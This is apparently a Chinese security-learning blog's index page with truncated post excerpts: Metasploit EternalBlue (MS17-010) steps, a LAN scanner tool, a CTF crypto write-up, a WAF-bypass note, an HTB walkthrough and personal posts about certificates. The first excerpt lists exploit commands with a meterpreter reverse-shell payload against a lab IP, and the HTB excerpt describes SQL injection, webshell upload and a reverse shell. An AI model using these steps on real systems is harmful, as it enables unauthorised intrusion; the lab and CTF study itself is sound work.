MSF获取Windows的shell后
扫描器的使用use auxiliary/scanner/smb/smb_ms17_010 攻击模块的使用下一步操作:发起攻击 (Exploit) 既然扫描器已经告诉你目标是“易受攻击”的,你现在的动作应该是从 辅助模块(Scanner) 切换到 攻击模块(Exploit)。 请按照以下顺序输入命令: 切换模块: Bash 1use exploit/windows/smb/ms17_010_eternalblue 设置目标 IP: Bash 1set RHOSTS 192.168.20.135 设置攻击载荷(通常默认就是这个,但建议检查一下): Bash 1set PAYLOAD windows/x64/meterpreter/reverse_tcp 设置你自己的 IP(Kali 的 IP,用于接收反弹回来的 Shell): Bash 12# 先在另一个终端用 ip addr 确认你的网卡 IPset LHOST [你的Kali的IP] 开火攻击: Bash 1exploit 进入Windows之后的操作 1. 基础环境与权限感知在任何操作...
局域网主机扫描
🌐 局域网扫描器 - 开发与使用文档项目地址:https://github.com/benbenbendang/scanner_nmap 1. 项目简介本项目是一个基于 Python 开发的局域网主机扫描工具。它不仅具备强大的网络探测功能,更拥有独特的赛博朋克 (Cyberpunk) 风格图形界面。软件旨在帮助网络管理员或极客用户快速识别当前网段内的存活主机、检测操作系统类型以及开放端口。 2. 功能特性 (Features)🛠 核心功能 网卡自动识别:启动时自动读取系统网络接口信息(IP/子网掩码),支持用户下拉选择目标网卡。 ARP 存活扫描:利用 ARP 协议(二层网络)快速、准确地发现同一局域网内的所有在线设备。 操作系统指纹识别:通过发送 ICMP 数据包并分析 TTL(生存时间)值,启发式地判断目标是 Windows、Linux/Android 还是网络设备。 端口安全检测:对发现的主机进行常用端口(如 21, 22, 80, 445, 3389 等)扫描,评估开放服务情况。 多线程处理:扫描过程在独立线程中运行,保证界面流畅不卡顿,并提供实...
第二届“Parloo”CTF应急响应挑战赛-学生组(CTF)
title: 第二届Parloo杯CTF应急响应挑战赛date: 2025-05-18 13:23:32categories: 网络安全tags: ctf 网络安全 应急响应 密码学 python banner_img: /img/df0fd0ee5e9bd441452f544d6a3b6250.png banner_img_height: 84 banner_mask_alpha: 0.3 Crypto循环锁链12311 0D 19 0E 12 2A 74 42 31 2B 25 00 07 0C 16 3927 21 03 00 28 0D 27 20 26 2C 19 00 0C 3B 04 3922 19 52 44 0D 还原思路简述 加密逻辑猜测 题面提示“每个字节被锁在一个无尽的循环中”,很像典型的环形 XOR: 1c[i] = p[i] ⊕ p[(i+1) mod N] (0 ≤ i < N) 其中 p 为明文,c 为给出的 37 字节密文。 利用已知前缀定位“起点” 已知 flag 以 1pal...
WAF的常见绕过方法
1这个是网上看到的二向箔WAF资料,感觉挺好的,借鉴一下
应急响应从理论到实战
\应急响应从理论到实战-知乎文章_page-0028.jpg)
关于我国奖证书无法下载这件事
关于我国家奖学金证书无法下载的这件事 我在读专科的时候,获得了国家奖学金,然后因为大三需要实习,所以我就没在学校,导致我的国家奖学金的证书没拿,后续毕业的时候去学校整理证书的时候发现,根本没有,今天突然想起来我的国家奖学金证书,打算买个外壳套起来(怎么说也是国家级的,后续国奖涨到1w了,哎得完了哈哈哈哈),结果没找到,只找到了之前的国家励志奖学金 然后我就突发奇想去网上找找看,能不能找到PDF版本,结果网上一查,都说在学信网,但是其实根本没有,又去抖音问也没有结果,最后在国家奖学金信息网找到了蛛丝马迹,但是有一个很搞笑的地方,就是进入这个网站查找证书需要证书编号和身份证号以及姓名,后两者好说,我本来就是来查证书的,我哪里晓得编号,但是我反应了一下,可能工信部的正式文件里有, 我在这里顺利找到了我的证书编号,然后进入查找,顺利找到,但是我以为我能下载的时候发现,根本没有下载的按钮 但是搞笑的是它这个网站链接上明明写着证书下载,搞不懂,真的搞不懂,没办法了
学习信安可以考的证书
学习信安应该考什么证书?首先先分享一下 顶级怨种才会考的证书 NISP一级 没错,就是CISP一级,这个证书,真真切切的没有任何含金量,真的一点都没有(考这个都不如去考计算机三级的信息安全工程师)那个工程师都还需要去背题,这个破证书纯纯就是给钱就送,一点没用 NISP二级CISP二级我没考,为什么没考二级 却考了一级呢?我纯纯傻13,被人坑了,起初我对这方面证书鸡毛不懂,只知道我当时从大一学信安,学到大三然后出来实习还是信安方面的,但是这些年中我根本没去考虑证书的事情,直到在群里有群友在讨论以后工作,简历上如何添彩,然后就去了解了,然后tmd那个CISP的什么盗版网站在百度上也不知道是不是买了流量,tmade,第一个搜的就是他,我点进去之后就开始介绍这个了,起初想考这个的原因是和CISP(注册信息安全专业人员)有联系,然后有人说了,这个证书就是大学生在校考的,考完毕业就能直接拿CISP了,然后我就准备考了,但是因为我稀里糊涂的考了NISP一级,我就长了一个心眼,我就去深度搜索这个证书,之后发现这个里面有坑,水很深,这个证书不能自己考,需要报中介,中介帮你报名,然后给你培训,然后去...
HTB-Usage-WP
先添加hosts 然后访问网页 目录扫描得到 admin.usage.htb子域名 在hosts中添加,然后查看 弱密码进不去,重新找洞, 可以根据框架寻找漏洞 注册账号看看 没事用,就是博客 漏洞暂时不知道版本,先不测试,继续找找输入框,看看有没有sql漏洞 忘记密码地方可以输入邮箱,测试发现有小问题,直接拉到sqlmap中跑 拉到本地,级别调最高进行测试 成功扫到库.进入博客库中查看admin密码 复制出来使用john爆破或者是hashcat爆破 hashid 查看加密方式 在hashcat中找到对应的代码 获取到正确密码 登录admin用户 没有如何有用信息,发现头像可以换,直接上传木马 编写木马 测试 但是有一个问题,马好像只能存在一分钟(甚至更短)所以上传成功后立马写shell弹到权限 尽量使用python吧 利用python升级成交互式shell root.txt在网站根目录下 大致思路是 先能登录dash用户 然后想办法登录另外一个用户(因为另外一个用户sudo中可以运行一个脚本) 然后想办法登录root 目前我们通过s...










